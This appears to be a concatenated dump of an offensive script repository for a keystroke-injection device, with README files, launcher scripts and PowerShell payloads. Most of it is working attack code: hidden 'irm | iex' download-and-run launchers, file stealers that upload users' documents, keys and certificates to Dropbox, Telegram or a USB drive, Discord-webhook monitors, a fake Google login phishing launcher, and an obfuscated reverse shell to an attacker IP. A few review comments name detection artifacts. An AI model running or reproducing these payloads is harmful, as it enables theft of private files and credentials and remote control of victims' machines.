2 |

Exfiltrate Files to Dropbox

3 | 4 | SYNOPSIS 5 | 6 | Uses Powershell to Exfiltrate all files of all specified filetypes to a DropBox account. 7 | 8 | SETUP 9 | 10 | make an app at https://www.dropbox.com/developers/apps (make sure to grant full access to your new app) 11 | generate an access token for your app and replace DROPBOX_ACCESS_TOKEN_HERE. 12 | 13 | USAGE 14 | 15 | 1. Input your credentials below 16 | 2. Run Script on target System 17 | 3. Check Discord for results 18 | 19 | #> -------------------------------------------------------------------------------- /Fast-Execution/Exfiltrate-to-Dropbox/main.ps1: -------------------------------------------------------------------------------- 1 | $accessToken = "$db" 2 | $localFolderPath = "$env:USERPROFILE" 3 | # Uploads files found under the current user's profile to Dropbox, under a folder named after the computer. $db is not set in this file; it is expected to be defined by the caller before the script runs. 4 | $computerName = "$env:COMPUTERNAME" 5 | $computerNameAsString = $computerName.ToString() 6 | $dropboxCreateFolderUrl = "https://api.dropboxapi.com/2/files/create_folder_v2" 7 | 8 | $dropboxFolderPath = $computerName.ToString() 9 | $dropboxUploadUrl = "https://content.dropboxapi.com/2/files/upload" 10 | # Request headers for the upload endpoint: the bearer token plus a raw octet-stream body; the per-file Dropbox-API-Arg header is added inside the loop. 11 | $headers = @{ 12 | "Authorization" = "Bearer $accessToken" 13 | "Content-Type" = "application/octet-stream" 14 | } 15 | $body = @{ 16 | "path" = "/$computerName" 17 | "autorename" = $true 18 | } | ConvertTo-Json 19 | # Recursively collect .docx, .txt, .pdf, .jpg and .png files under the user profile. 20 | $files = Get-ChildItem -Path $localFolderPath -Include "*.docx","*.txt","*.pdf","*.jpg","*.png" -Recurse 21 | # NOTE(review): detection pivots - powershell.exe reading document and image files across the whole profile, followed by one POST per file to content.dropboxapi.com; the empty catch hides upload errors from the console only, not from network or endpoint telemetry. 22 | foreach ($file in $files) { 23 | $relativePath = $file.FullName.Replace($localFolderPath, '').TrimStart('\') 24 | $dropboxFilePath = "$dropboxFolderPath/$relativePath".Replace('\', '/') 25 | $headers["Dropbox-API-Arg"] = "{`"path`": `"/$dropboxFilePath`", `"mode`": `"add`", `"autorename`": true, `"mute`": false}" 26 | try { 27 | $fileBytes = [System.IO.File]::ReadAllBytes($file.FullName) 28 | $response = Invoke-RestMethod -Uri $dropboxUploadUrl -Method Post -Headers $headers -Body $fileBytes 29 | } 30 | catch {} 31 | } 32 |
-------------------------------------------------------------------------------- /Fast-Execution/Exfiltrate-to-Telegram/Exfiltrate-to-Telegram.js: -------------------------------------------------------------------------------- 1 | // Title: beigeworm's Exfiltrate files to Telegram 2 | // Author: @beigeworm 3 | // Description: This script searches the user's folders for pictures, documents, logs, PDFs and more, then sends it all to a Telegram chat. 4 | // Target: Windows 10 5 | // *SETUP* 6 | // replace TELEGRAM_TOKEN with your Telegram Token. 7 | // NOTE(review): commands entered through the Run dialog are recorded under the per-user RunMRU registry key, which makes that key a useful artifact when triaging a suspected keystroke-injection device. 8 | // script setup 9 | layout("us") 10 | // NOTE(review): -NoP (no profile), -Ep Bypass (execution policy bypass) and -W H (hidden window) combined with `irm <url> | iex` is a download-and-run launcher; script-block logging, where enabled, records the downloaded body as well as the launcher. 11 | // Open the Run dialog (Win+R) and type a hidden PowerShell one-liner that downloads the script and runs it 12 | delay(1000); 13 | press("GUI r"); 14 | delay(1000); 15 | type("powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://raw.githubusercontent.com/beigeworm/PwnPi-Scripts/main/Fast-Execution/Exfiltrate-to-Telegram/main.ps1 | iex"); 16 | delay(500); 17 | press("ENTER"); -------------------------------------------------------------------------------- /Fast-Execution/Exfiltrate-to-Telegram/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Exfiltrate Files to Telegram

3 | 4 | SYNOPSIS 5 | 6 | This script connects target computer with a telegram chat to upload certain files to telegram . 7 | 8 | SETUP INSTRUCTIONS 9 | 10 | 1. visit https://t.me/botfather and make a bot. 11 | 2. add bot api to script. 12 | 3. search for bot in top left box in telegram and start a chat then type /start. 13 | 4. Replace TELEGRAM_TOKEN with your token 14 | 5. Run Script on target System -------------------------------------------------------------------------------- /Fast-Execution/Exfiltrate-to-Telegram/main.ps1: -------------------------------------------------------------------------------- 1 | $Token = "$tg" 2 | $URL='https://api.telegram.org/bot{0}' -f $Token 3 | 4 | while($chatID.length -eq 0){ 5 | $updates = Invoke-RestMethod -Uri ($url + "/getUpdates") 6 | if ($updates.ok -eq $true) {$latestUpdate = $updates.result[-1] 7 | if ($latestUpdate.message -ne $null){$chatID = $latestUpdate.message.chat.id}} 8 | Sleep 10 9 | } 10 | 11 | Function Exfiltrate { 12 | 13 | param ([string[]]$FileType,[string[]]$Path) 14 | $maxZipFileSize = 50MB 15 | $currentZipSize = 0 16 | $index = 1 17 | $zipFilePath ="$env:temp/Loot$index.zip" 18 | $MessageToSend = New-Object psobject 19 | $MessageToSend | Add-Member -MemberType NoteProperty -Name 'chat_id' -Value $ChatID 20 | $MessageToSend | Add-Member -MemberType NoteProperty -Name 'text' -Value "$env:COMPUTERNAME : Exfiltration Started." 
-Force 21 | irm -Method Post -Uri ($URL +'/sendMessage') -Body ($MessageToSend | ConvertTo-Json) -ContentType "application/json" 22 | 23 | If($Path -ne $null){ 24 | $foldersToSearch = "$env:USERPROFILE\"+$Path 25 | }else{ 26 | $foldersToSearch = @("$env:USERPROFILE\Documents","$env:USERPROFILE\Desktop","$env:USERPROFILE\Downloads","$env:USERPROFILE\OneDrive","$env:USERPROFILE\Pictures","$env:USERPROFILE\Videos") 27 | } 28 | 29 | If($FileType -ne $null){ 30 | $fileExtensions = "*."+$FileType 31 | }else { 32 | $fileExtensions = @("*.log", "*.db", "*.txt", "*.doc", "*.pdf", "*.jpg", "*.jpeg", "*.png", "*.wdoc", "*.xdoc", "*.cer", "*.key", "*.xls", "*.xlsx", "*.cfg", "*.conf", "*.wpd", "*.rft") 33 | } 34 | 35 | Add-Type -AssemblyName System.IO.Compression.FileSystem 36 | $zipArchive = [System.IO.Compression.ZipFile]::Open($zipFilePath, 'Create') 37 | $escmsg = "Files from : "+$env:COMPUTERNAME 38 | 39 | foreach ($folder in $foldersToSearch) { 40 | foreach ($extension in $fileExtensions) { 41 | $files = Get-ChildItem -Path $folder -Filter $extension -File -Recurse 42 | foreach ($file in $files) { 43 | $fileSize = $file.Length 44 | if ($currentZipSize + $fileSize -gt $maxZipFileSize) { 45 | $zipArchive.Dispose() 46 | $currentZipSize = 0 47 | curl.exe -F chat_id="$ChatID" -F document=@"$zipFilePath" "https://api.telegram.org/bot$Token/sendDocument" 48 | Remove-Item -Path $zipFilePath -Force 49 | Sleep 1 50 | $index++ 51 | $zipFilePath ="$env:temp/Loot$index.zip" 52 | $zipArchive = [System.IO.Compression.ZipFile]::Open($zipFilePath, 'Create') 53 | } 54 | $entryName = $file.FullName.Substring($folder.Length + 1) 55 | [System.IO.Compression.ZipFileExtensions]::CreateEntryFromFile($zipArchive, $file.FullName, $entryName) 56 | $currentZipSize += $fileSize 57 | } 58 | } 59 | } 60 | $zipArchive.Dispose() 61 | curl.exe -F chat_id="$ChatID" -F document=@"$zipFilePath" "https://api.telegram.org/bot$Token/sendDocument" 62 | Remove-Item -Path $zipFilePath -Force 63 | Write-Output 
"$env:COMPUTERNAME : Exfiltration Complete." 64 | } 65 | 66 | 67 | # Define What you want to search for (examples at the top) 68 | Exfiltrate -Path documents -FileType log 69 | -------------------------------------------------------------------------------- /Fast-Execution/Exfiltrate-to-USB/Exfiltrate-to-USB.js: -------------------------------------------------------------------------------- 1 | // Title: beigeworm's Exfiltrate files USB Drive 2 | // Author: @beigeworm 3 | // Description: This script searches the users folder fot pictures, documents, logs, PDFs and more, then sends its all to newly connected USB drive. 4 | // Target: Windows 10 5 | 6 | // SETUP (optional) 7 | // Add your USB drive Name in quotes for $driveName 8 | // Add Y or N in quotes for $Hidden (hides console window) 9 | 10 | // script setup 11 | layout("us") 12 | 13 | // Open Powershell and download script 14 | delay(1000); 15 | press("GUI r"); 16 | delay(1000); 17 | type("powershell -NoP -Ep Bypass -C $driveName = ''; $Hidden = ''; irm https://raw.githubusercontent.com/beigeworm/PwnPi-Scripts/main/Fast-Execution/Exfiltrate-to-USB/main.ps1 | iex"); 18 | delay(500); 19 | press("ENTER"); 20 | -------------------------------------------------------------------------------- /Fast-Execution/Exfiltrate-to-USB/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Exfiltrate Files to USB

3 | 4 | SYNOPSIS 5 | 6 | Waits for a new USB Storage device to be connected and then copies many user files to that USB drive. 7 | 8 | USAGE 9 | 10 | 1. Run the script. 11 | 2. Choose if you want to hide the console window (silent mode) 12 | 3. Connect a USB Drive to the computer 13 | 4. Copying files will automatically begin to the newly connected drive 14 | 5. 'Completed' message will appear when finished (hidden mode only) 15 | 16 | -------------------------------------------------------------------------------- /Fast-Execution/Exfiltrate-to-USB/main.ps1: -------------------------------------------------------------------------------- 1 | [Console]::BackgroundColor = "Black" 2 | [Console]::SetWindowSize(57, 5) 3 | [Console]::Title = "Exfiltration" 4 | Clear-Host 5 | 6 | if($driveName.length -lt 1){ 7 | $driveName = Read-Host "Enter the name of the USB drive " 8 | } 9 | 10 | if($hidden.length -lt 1){ 11 | $hidden = Read-Host "Would you like to hide this console window? (Y/N) " 12 | } 13 | 14 | $i = 10 15 | 16 | While ($true){ 17 | cls 18 | Write-Host "Waiting for USB Drive.. ($i)" -ForegroundColor Yellow 19 | $drive = Get-WMIObject Win32_LogicalDisk | ? {$_.VolumeName -eq $driveName} | select DeviceID 20 | sleep 1 21 | if ($drive.length -ne 0){ 22 | Write-Host "USB Drive Connected!" -ForegroundColor Green 23 | break 24 | } 25 | $i-- 26 | if ($i -eq 0 ){ 27 | Write-Host "Timeout! Exiting" -ForegroundColor Red 28 | sleep 1 29 | exit 30 | } 31 | } 32 | 33 | [Console]::SetWindowSize(80, 30) 34 | 35 | $drive = Get-WMIObject Win32_LogicalDisk | ? 
{$_.VolumeName -eq $driveName} 36 | $driveletter = $drive.DeviceID 37 | Write-Host "Loot Drive Set To : $driveLetter/" -ForegroundColor Green 38 | $fileExtensions = @("*.log", "*.db", "*.txt", "*.doc", "*.pdf", "*.jpg", "*.jpeg", "*.png", "*.wdoc", "*.xdoc", "*.cer", "*.key", "*.xls", "*.xlsx", "*.cfg", "*.conf", "*.wpd", "*.rft") 39 | $foldersToSearch = @("$env:USERPROFILE\Documents","$env:USERPROFILE\Desktop","$env:USERPROFILE\Downloads","$env:USERPROFILE\OneDrive","$env:USERPROFILE\Pictures","$env:USERPROFILE\Videos") 40 | $destinationPath = "$driveLetter\$env:COMPUTERNAME-Loot" 41 | 42 | if (-not (Test-Path -Path $destinationPath)) { 43 | New-Item -ItemType Directory -Path $destinationPath -Force 44 | Write-Host "New Folder Created : $destinationPath" -ForegroundColor Green 45 | } 46 | 47 | If ($hidden -eq 'y'){ 48 | Write-Host "Hiding the Window.." -ForegroundColor Red 49 | sleep 1 50 | $Async = '[DllImport("user32.dll")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);' 51 | $Type = Add-Type -MemberDefinition $Async -name Win32ShowWindowAsync -namespace Win32Functions -PassThru 52 | $hwnd = (Get-Process -PID $pid).MainWindowHandle 53 | if($hwnd -ne [System.IntPtr]::Zero){ 54 | $Type::ShowWindowAsync($hwnd, 0) 55 | } 56 | else{ 57 | $Host.UI.RawUI.WindowTitle = 'hideme' 58 | $Proc = (Get-Process | Where-Object { $_.MainWindowTitle -eq 'hideme' }) 59 | $hwnd = $Proc.MainWindowHandle 60 | $Type::ShowWindowAsync($hwnd, 0) 61 | } 62 | } 63 | 64 | foreach ($folder in $foldersToSearch) { 65 | Write-Host "Searching in $folder" -ForegroundColor Yellow 66 | 67 | foreach ($extension in $fileExtensions) { 68 | $files = Get-ChildItem -Path $folder -Recurse -Filter $extension -File 69 | 70 | foreach ($file in $files) { 71 | $destinationFile = Join-Path -Path $destinationPath -ChildPath $file.Name 72 | Write-Host "Copying $($file.FullName) to $($destinationFile)" -ForegroundColor Gray 73 | Copy-Item -Path $file.FullName -Destination $destinationFile 
-Force 74 | } 75 | } 76 | } 77 | If ($hidden -eq 'y'){ 78 | (New-Object -ComObject Wscript.Shell).Popup("File Exfiltration Complete",5,"Exfiltration",0x0) 79 | } 80 | else{ 81 | Write-Host "File Exfiltration Complete" -ForegroundColor Green 82 | } 83 | -------------------------------------------------------------------------------- /Fast-Execution/File-Monitor-to-Discord/File-Changes-to-Discord.js: -------------------------------------------------------------------------------- 1 | // Title: beigeworm's monitor file changes to Discord Webhook. 2 | // Author: @beigeworm 3 | // Description: This script monitors any file changes in the USERPROFILE directory and posts results to a discord webhook. 4 | // Target: Windows 10 5 | // *SETUP* 6 | // replace DISCORD_WEBHOOK_HERE with your Discord Webhook. 7 | 8 | // script setup 9 | layout("us") 10 | 11 | // Open Powershell and download script 12 | delay(1000); 13 | press("GUI r"); 14 | delay(1000); 15 | type("powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_fm_to_dc | iex"); 16 | delay(500); 17 | press("ENTER"); 18 | -------------------------------------------------------------------------------- /Fast-Execution/File-Monitor-to-Discord/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Filesystem Monitor to Discord

3 | 4 | SYNOPSIS 5 | 6 | This script gathers information about any changes to any files in the "%USERPROFILE% folder". 7 | 8 | USAGE 9 | 2. Run Script on target System 10 | 3. Check temp folder for results 11 | -------------------------------------------------------------------------------- /Fast-Execution/File-Monitor-to-Discord/main.ps1: -------------------------------------------------------------------------------- 1 | $whuri = "$dc" 2 | 3 | $watcher = New-Object System.IO.FileSystemWatcher -Property @{ 4 | Path = $env:USERPROFILE + '\' 5 | } 6 | $watcher.NotifyFilter = [System.IO.NotifyFilters]::FileName -bor ` 7 | [System.IO.NotifyFilters]::LastWrite -bor ` 8 | [System.IO.NotifyFilters]::DirectoryName 9 | 10 | $action = { 11 | $event = $EventArgs 12 | $path = $event.FullPath 13 | $changeType = $event.ChangeType 14 | $timestamp = Get-Date -Format "yyyy-MM-dd HH:mm:ss" 15 | 16 | $msgsys = "[$timestamp] File $changeType > $path" 17 | $escmsgsys = $msgsys -replace '[&<>]', {$args[0].Value.Replace('&', '&').Replace('<', '<').Replace('>', '>')} 18 | $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = $escmsgsys} | ConvertTo-Json 19 | Invoke-RestMethod -Uri $whuri -Method Post -ContentType "application/json" -Body $jsonsys 20 | 21 | } 22 | 23 | Register-ObjectEvent -InputObject $watcher -EventName Created -Action $action 24 | Register-ObjectEvent -InputObject $watcher -EventName Deleted -Action $action 25 | Register-ObjectEvent -InputObject $watcher -EventName Changed -Action $action 26 | 27 | $watcher.EnableRaisingEvents = $true 28 | 29 | while ($true) { 30 | Start-Sleep -Milliseconds 500 31 | } 32 | 33 | Unregister-Event -InputObject $watcher -EventName Created -Action $action 34 | Unregister-Event -InputObject $watcher -EventName Deleted -Action $action 35 | Unregister-Event -InputObject $watcher -EventName Changed -Action $action 36 | -------------------------------------------------------------------------------- 
/Fast-Execution/Filetype-Organizer/Filetype-Organizer.js: -------------------------------------------------------------------------------- 1 | // Title: Filetype Organizer 2 | // Author: @beigeworm 3 | // Description: This script searches the users folder for any files with a specific filetype and copies them to the user folder. 4 | // Target: Windows 10 5 | 6 | // script setup 7 | layout("us") 8 | 9 | // Open Powershell and download script 10 | delay(1000); 11 | press("GUI r"); 12 | delay(1000); 13 | type("powershell -NoP -Ep Bypass -W H -C cd $env:USERPROFILE; irm https://raw.githubusercontent.com/beigeworm/PwnPi-Scripts/main/Fast-Execution/Filetype-Organizer/main.ps1 | iex"); 14 | delay(500); 15 | press("ENTER"); 16 | -------------------------------------------------------------------------------- /Fast-Execution/Filetype-Organizer/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Search Folders For Filetypes

3 | 4 | SYNOPSIS 5 | 6 | Searches User folder for any files with specific filetype and copies them. 7 | 8 | USAGE 9 | 10 | 1. Run Script. 11 | 2. follow instructions in the console. -------------------------------------------------------------------------------- /Fast-Execution/Filetype-Organizer/main.ps1: -------------------------------------------------------------------------------- 1 | 2 | $Host.UI.RawUI.BackgroundColor = "Black" 3 | Clear-Host 4 | $width = 88 5 | $height = 30 6 | [Console]::SetWindowSize($width, $height) 7 | $windowTitle = " BeigeTools | Filetype Organizer" 8 | [Console]::Title = $windowTitle 9 | Write-Host "=======================================================================================" -ForegroundColor Green 10 | Write-Host "============================= BeigeTools | Filetype Organizer =================================" -ForegroundColor Green 11 | Write-Host "=======================================================================================`n" -ForegroundColor Green 12 | Write-Host "More info at : https://github.com/beigeworm" -ForegroundColor DarkGray 13 | Write-Host "Starts a GUI window to select a folder, then search for every file with a selected filetype and output to respective named files in the root folder.`n" 14 | 15 | # Get the directory of the script 16 | $scriptDirectory = Split-Path -Parent $MyInvocation.MyCommand.Definition 17 | 18 | # Prompt user for file extensions 19 | $fileExtensions = Read-Host "Enter file extensions separated by commas (e.g., jpg,mp4,png)" 20 | 21 | # Convert the input into an array 22 | $fileExtensionsArray = $fileExtensions -split ',' 23 | 24 | # Prompt user for folder to search recursively 25 | $folderPath = Read-Host "Enter the folder path to search recursively" 26 | 27 | # Prompt user to choose between move or copy 28 | $operation = Read-Host "Enter 'M' to move files, 'C' to copy files" 29 | 30 | # Validate the user input for the operation 31 | if ($operation -ne 'M' -and $operation -ne 
'C') { 32 | Write-Host "Invalid operation. Please enter 'M' for move or 'C' for copy." 33 | exit 34 | } 35 | 36 | # Create output folders in the script directory 37 | foreach ($extension in $fileExtensionsArray) { 38 | $folderName = $extension.Trim() 39 | $folderPathForExtension = Join-Path $scriptDirectory $folderName 40 | New-Item -ItemType Directory -Path $folderPathForExtension -Force 41 | } 42 | 43 | # Search for files and move/copy to appropriate folders 44 | foreach ($extension in $fileExtensionsArray) { 45 | $files = Get-ChildItem -Path $folderPath -Recurse -Include "*.$extension" 46 | 47 | foreach ($file in $files) { 48 | $destinationFolder = Join-Path $scriptDirectory $extension.Trim() 49 | 50 | if ($operation -eq 'M') { 51 | $ind = $file.FullName 52 | Move-Item $file.FullName -Destination $destinationFolder -Force 53 | Write-Host "Moved : $ind" 54 | 55 | } elseif ($operation -eq 'C') { 56 | $ind = $file.FullName 57 | Copy-Item $file.FullName -Destination $destinationFolder -Force 58 | Write-Host "Copied : $ind" 59 | } 60 | } 61 | } 62 | 63 | Write-Host "Operation Complete." -ForegroundColor Green 64 | pause -------------------------------------------------------------------------------- /Fast-Execution/GIF-Player/Gif-Player.js: -------------------------------------------------------------------------------- 1 | // Title: beigeworm's GIF Player. 2 | // Author: @beigeworm 3 | // Description: This script changes downlaods a rick and morty GIF and plays it in a GUI window. 
4 | // Target: Windows 10 5 | 6 | // script setup 7 | layout("us") 8 | 9 | // Open Powershell and download script 10 | delay(1000); 11 | press("GUI r"); 12 | delay(1000); 13 | type("powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/PwnPi-Scripts/main/Fast-Execution/GIF-Player/main.ps1 | iex"); 14 | delay(500); 15 | press("ENTER"); -------------------------------------------------------------------------------- /Fast-Execution/GIF-Player/README.md: -------------------------------------------------------------------------------- 1 | 2 |

GIF Player in Powershell

3 | 4 | SYNOPSIS 5 | 6 | This Script downloads a GIF from Giphy and plays it in a GUI window. 7 | 8 | USAGE 9 | 10 | 1. Run this script in powershell 11 | -------------------------------------------------------------------------------- /Fast-Execution/GIF-Player/main.ps1: -------------------------------------------------------------------------------- 1 | Add-Type -AssemblyName System.Windows.Forms 2 | Add-Type -AssemblyName System.Drawing 3 | [System.Windows.Forms.Application]::EnableVisualStyles() 4 | 5 | $url = "https://media3.giphy.com/media/tJqyalvo9ahykfykAj/giphy.gif?ep=v1_gifs_search" # example GIF (replace with your own link) 6 | $gifPath = "$env:temp/g.gif" 7 | iwr -Uri $url -OutFile $gifPath 8 | $ErrorActionPreference = 'Stop' 9 | 10 | function Play-Gif { 11 | param( 12 | [string]$GifPath 13 | ) 14 | 15 | $form = New-Object System.Windows.Forms.Form 16 | $pictureBox = New-Object System.Windows.Forms.PictureBox 17 | $timer = New-Object System.Windows.Forms.Timer 18 | 19 | $form.Text = "GIF Player" 20 | $form.Size = New-Object System.Drawing.Size(490, 300) 21 | $form.StartPosition = 'CenterScreen' 22 | $form.Topmost = $true 23 | 24 | $pictureBox.Size = $form.Size 25 | $pictureBox.Image = [System.Drawing.Image]::FromFile($GifPath) 26 | 27 | $timer.Interval = 50 # Adjust the interval as needed for desired animation speed 28 | $timer.Add_Tick({ 29 | $pictureBox.Image.SelectActiveFrame([System.Drawing.Imaging.FrameDimension]::Time, $timer.Tag) 30 | $pictureBox.Refresh() 31 | $timer.Tag = ($timer.Tag + 1) % $pictureBox.Image.GetFrameCount([System.Drawing.Imaging.FrameDimension]::Time) 32 | }) 33 | 34 | $timer.Tag = 0 35 | 36 | $form.Controls.Add($pictureBox) 37 | 38 | $form.Add_Shown({ $timer.Start() }) 39 | 40 | $form.ShowDialog() 41 | } 42 | 43 | Play-Gif -GifPath $gifPath 44 | sleep 1 45 | Remove-Item $gifPath 46 | -------------------------------------------------------------------------------- /Fast-Execution/Google-Phishing/Google-Phish-to-Discord.js: 
-------------------------------------------------------------------------------- 1 | // Title: beigeworm's Fake Google Phishing page to Discord Webhook. 2 | // Author: @beigeworm 3 | // Description: This script makes a Fake Google Phishing page and posts results to a discord webhook. 4 | // Target: Windows 10 5 | // *SETUP* 6 | // replace DISCORD_WEBHOOK_HERE with your Discord Webhook. 7 | 8 | // script setup 9 | layout("us") 10 | 11 | // Open Powershell and download script 12 | delay(1000); 13 | press("GUI r"); 14 | delay(1000); 15 | type("powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_gp_to_dc | iex"); 16 | delay(500); 17 | press("ENTER"); 18 | -------------------------------------------------------------------------------- /Fast-Execution/Google-Phishing/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Google Sign in to Discord

3 | 4 | SYNOPSIS 5 | 6 | Uses Powershell and HTML to create a fake google login page which catches login credentials and sends them to a webhook. 7 | 8 | USAGE 9 | 10 | 1. Replace YOUR_WEBBHOOK_HERE with your webhook 11 | 2. Run script on target system. 12 | -------------------------------------------------------------------------------- /Fast-Execution/LAN-Tools/LAN-Tools.js: -------------------------------------------------------------------------------- 1 | // Title: beigeworm's LAN Tools 2 | // Author: @beigeworm 3 | // Description: Start up a HTTP server and run a selection of Local Area Network Tools using Powershell. 4 | // NOTE - This script will need Admin privileges to run properly. 5 | 6 | // script setup 7 | layout("us") 8 | 9 | // Open Powershell and download script 10 | delay(1000); 11 | press("GUI r"); 12 | delay(1000); 13 | type("powershell -NoP -Ep Bypass -C irm https://raw.githubusercontent.com/beigeworm/Posh-LAN/main/Posh-LAN-Tools.ps1 | iex"); 14 | delay(500); 15 | press("ENTER"); -------------------------------------------------------------------------------- /Fast-Execution/LAN-Tools/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Beigeworm's Powershell LAN Toolset

3 | 4 | MAIN SCRIPT HERE - https://github.com/beigeworm/Posh-LAN 5 | 6 | SYNOPSIS 7 | 8 | Start up an HTTP server and run a selection of Local Area Network Tools using Powershell. 9 | 10 | USAGE 11 | 12 | 1. Run this script on target computer and note the URL provided 13 | 2. On another device on the same network, enter the provided URL in a browser window 14 | 15 | NOTE 16 | 17 | This script will need Admin privileges to run properly. 18 | -------------------------------------------------------------------------------- /Fast-Execution/Mouse-Monitor-to-Discord/Mouse-Activity-to-Discord.js: -------------------------------------------------------------------------------- 1 | // Title: beigeworm's monitor mouse activity to Discord Webhook. 2 | // Author: @beigeworm 3 | // Description: This script monitors mouse activity and posts results to a discord webhook. 4 | // Target: Windows 10 5 | // *SETUP* 6 | // replace DISCORD_WEBHOOK_HERE with your Discord Webhook. 7 | 8 | // script setup 9 | layout("us") 10 | 11 | // Open Powershell and download script 12 | delay(1000); 13 | press("GUI r"); 14 | delay(1000); 15 | type("powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_mm_to_dc | iex"); 16 | delay(500); 17 | press("ENTER"); 18 | -------------------------------------------------------------------------------- /Fast-Execution/Mouse-Monitor-to-Discord/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Mouse Monitor to Discord

3 | 4 | SYNOPSIS 5 | 6 | This script gathers information about any mouse movement and idletime and sends info to Discord". 7 | 8 | USAGE 9 | 10 | 2. Run Script on target System 11 | 3. Check Discord for results 12 | -------------------------------------------------------------------------------- /Fast-Execution/Mouse-Monitor-to-Discord/main.ps1: -------------------------------------------------------------------------------- 1 | $whuri = "$dc" 2 | 3 | $signature = @' 4 | [DllImport("user32.dll")] 5 | [return: MarshalAs(UnmanagedType.Bool)] 6 | public static extern bool GetCursorPos(out POINT lpPoint); 7 | [StructLayout(LayoutKind.Sequential)] 8 | public struct POINT 9 | { 10 | public int X; 11 | public int Y; 12 | } 13 | '@ 14 | 15 | $timestamp = Get-Date -Format "yyyy-MM-dd HH:mm:ss" 16 | $outpath = "$env:temp\info.txt" 17 | $cursorType = Add-Type -MemberDefinition $signature -Name "CursorPos" -Namespace "Win32" -PassThru 18 | $prevX = 0 19 | $idleThreshold = New-TimeSpan -Seconds 60 20 | $lastActivityTime = [System.DateTime]::Now 21 | $isActive = $true 22 | $iActive = $true 23 | sleep 1 24 | 25 | while ($true) { 26 | $cursorPos = New-Object Win32.CursorPos+POINT 27 | [Win32.CursorPos]::GetCursorPos([ref]$cursorPos) | Out-Null 28 | $currentX = $cursorPos.X 29 | $currentTime = [System.DateTime]::Now 30 | 31 | if ($currentX -ne $prevX) { 32 | if ($iActive) { 33 | $prevX = $currentX 34 | $lastActivityTime = $currentTime 35 | 36 | if ($idleTime -lt $idleThreshold) { 37 | $msgsys = "[$timestamp] : Mouse is active" 38 | $escmsgsys = $msgsys -replace '[&<>]', {$args[0].Value.Replace('&', '&').Replace('<', '<').Replace('>', '>')} 39 | $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = $escmsgsys} | ConvertTo-Json 40 | Invoke-RestMethod -Uri $whuri -Method Post -ContentType "application/json" -Body $jsonsys 41 | } 42 | $iActive = $false 43 | } 44 | } 45 | else { 46 | $iActive = $true 47 | } 48 | 49 | 50 | $idleTime = $currentTime - $lastActivityTime 51 | 52 | if 
($idleTime -ge $idleThreshold) { 53 | if ($isActive) { 54 | $msgsys = "[$timestamp] : Mouse has been inactive for 60 seconds" 55 | $escmsgsys = $msgsys -replace '[&<>]', {$args[0].Value.Replace('&', '&').Replace('<', '<').Replace('>', '>')} 56 | $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = $escmsgsys} | ConvertTo-Json 57 | Invoke-RestMethod -Uri $whuri -Method Post -ContentType "application/json" -Body $jsonsys 58 | $isActive = $false 59 | $iActive = $true 60 | } 61 | else { 62 | } 63 | } 64 | else { 65 | $isActive = $true 66 | } 67 | Start-Sleep -Milliseconds 60 68 | } 69 | 70 | -------------------------------------------------------------------------------- /Fast-Execution/Netcat-Client/README.md: -------------------------------------------------------------------------------- 1 | 2 |

Simple Netcat Client

3 | 4 | SYNOPSIS 5 | 6 | Opens a netcat connection to a Windows machine in Powershell 7 | 8 | USAGE 9 | 10 | 1. Download Ncat For windows. https://nmap.org/download#windows 11 | 2. Change "YOUR IP HERE" to the attacker machine's ipv4 address (find using ipconfig on windows) 12 | 3. Open a terminal on the attacker machine and type "nc -lvp 4444" 13 | 4. Run this script on the client machine. 14 | 15 | NOTE 16 | 17 | The PORT number is 4444 -------------------------------------------------------------------------------- /Fast-Execution/Netcat-Client/Simple-Netcat-Client.js: -------------------------------------------------------------------------------- 1 | // Title: Beigeworm's Simple Netcat Client 2 | // Author: @beigeworm 3 | // Description: This script connects target computer with a netcat session to send powershell commands. 4 | // Target: Windows 10 5 | // *SETUP* 6 | // replace IP_HERE with your netcat attacker IP Address. 7 | // NOTE The PORT number is 4444 8 | 9 | // script setup 10 | layout("us") 11 | 12 | // Open Powershell and download script 13 | delay(1000); 14 | press("GUI r"); 15 | delay(1000); 16 | type("powershell -NoP -Ep Bypass -W H -C $ip='IP_HERE'; irm https://raw.githubusercontent.com/beigeworm/PwnPi-Scripts/main/Fast-Execution/Netcat-Client/main.ps1 | iex"); 17 | delay(500); 18 | press("ENTER"); -------------------------------------------------------------------------------- /Fast-Execution/Netcat-Client/main.ps1: -------------------------------------------------------------------------------- 1 |  2 | do{ 3 | $v = 4 4 | $a = New-Object S`ySt`em.N`eT.`s`ock`eTs.TC`PC`li`eNt("$ip",4444) 5 | $b = $a.GetStream();[byte[]]$c = 0..65535|%{0} 6 | while(($d = $b.Read($c, 0, $c.Length)) -ne 0){ 7 | $e = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($c,0, $d) 8 | $f = (iex $e 2>&1 | Out-String );$g = $f + (pwd).Path + '> ' 9 | $h = ([text.encoding]::ASCII).GetBytes($g) 10 | $b.Write($h,0,$h.Length) 11 | $b.Flush()} 12 | $a.Close() 13 | 
